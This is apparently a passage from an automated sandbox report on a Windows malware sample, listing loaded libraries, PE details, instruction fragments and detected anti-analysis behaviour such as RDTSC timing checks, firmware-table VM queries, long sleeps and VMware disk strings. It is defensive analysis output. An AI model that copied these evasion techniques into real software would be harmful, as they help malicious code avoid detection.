          Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.ui.xaml.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windowsinternal.composableshell.desktophosting.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: uiamanager.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: TU0kiz3mxz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: TU0kiz3mxz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: TU0kiz3mxz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: explorer.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdbSHA2568 source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TU0kiz3mxz.exe, TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdb source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: TU0kiz3mxz.exeStatic PE information: 0xACB40EDC [Tue Oct 25 15:57:16 2061 UTC]
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041B854 push edi; ret 3_2_0041B85C
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041E96F push ebp; ret 3_2_0041E986
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041E903 push edx; ret 3_2_0041E907
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D475 push eax; ret 3_2_0041D4C8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D4C2 push eax; ret 3_2_0041D4C8
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D4CB push eax; ret 3_2_0041D532
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_0041D52C push eax; ret 3_2_0041D532
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_010C09AD push ecx; mov dword ptr [esp], ecx3_2_010C09B6
          Source: C:\Windows\explorer.exeCode function: 4_2_0E73DB1E push esp; retn 0000h4_2_0E73DB1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0E73DB02 push esp; retn 0000h4_2_0E73DB03
          Source: C:\Windows\explorer.exeCode function: 4_2_0E73D9B5 push esp; retn 0000h4_2_0E73DAE7
          Source: C:\Windows\explorer.exeCode function: 4_2_0E9129B5 push esp; retn 0000h4_2_0E912AE7
          Source: C:\Windows\explorer.exeCode function: 4_2_0E912B1E push esp; retn 0000h4_2_0E912B1F
          Source: C:\Windows\explorer.exeCode function: 4_2_0E912B02 push esp; retn 0000h4_2_0E912B03
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB27FA pushad ; ret 5_2_04BB27F9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB225F pushad ; ret 5_2_04BB27F9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BB283D push eax; iretd 5_2_04BB2858
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04BE09AD push ecx; mov dword ptr [esp], ecx5_2_04BE09B6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D4C2 push eax; ret 5_2_0296D4C8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D4CB push eax; ret 5_2_0296D532
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D475 push eax; ret 5_2_0296D4C8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296D52C push eax; ret 5_2_0296D532
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296B854 push edi; ret 5_2_0296B85C
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E903 push edx; ret 5_2_0296E907
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0296E96F push ebp; ret 5_2_0296E986
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAE9B5 push esp; retn 0000h5_2_04AAEAE7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAEB02 push esp; retn 0000h5_2_04AAEB03
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04AAEB1E push esp; retn 0000h5_2_04AAEB1F
          Source: TU0kiz3mxz.exeStatic PE information: section name: .text entropy: 7.494852033166654
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: TU0kiz3mxz.exe PID: 1928, type: MEMORYSTR
          Query firmware table information (likely to detect VMs)
          Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformation
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\explorer.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 2959904 second address: 295990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 2959B6E second address: 2959B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 2420000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 2480000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 8710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 9710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: 9910000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeMemory allocated: A910000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeCode function: 3_2_00409AA0 rdtsc 3_2_00409AA0
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 5331Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4615Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 873Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 881Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3121Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 6851Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 8612
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 381
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 788
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 756
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-13957
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeAPI coverage: 1.7 %
          Source: C:\Windows\SysWOW64\explorer.exeAPI coverage: 2.2 %
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exe TID: 2676Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2132Thread sleep count: 5331 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2132Thread sleep time: -10662000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 2132Thread sleep count: 4615 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 2132Thread sleep time: -9230000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5820Thread sleep count: 3121 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5820Thread sleep time: -6242000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5820Thread sleep count: 6851 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 5820Thread sleep time: -13702000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -17224000s >= -30000s
          Source: C:\Windows\explorer.exe TID: 6540Thread sleep time: -762000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000004.00000000.1713435534.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000004.00000000.1707105236.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000004.00000000.1709658723.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000F.00000002.4153825583.00000000010E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000006
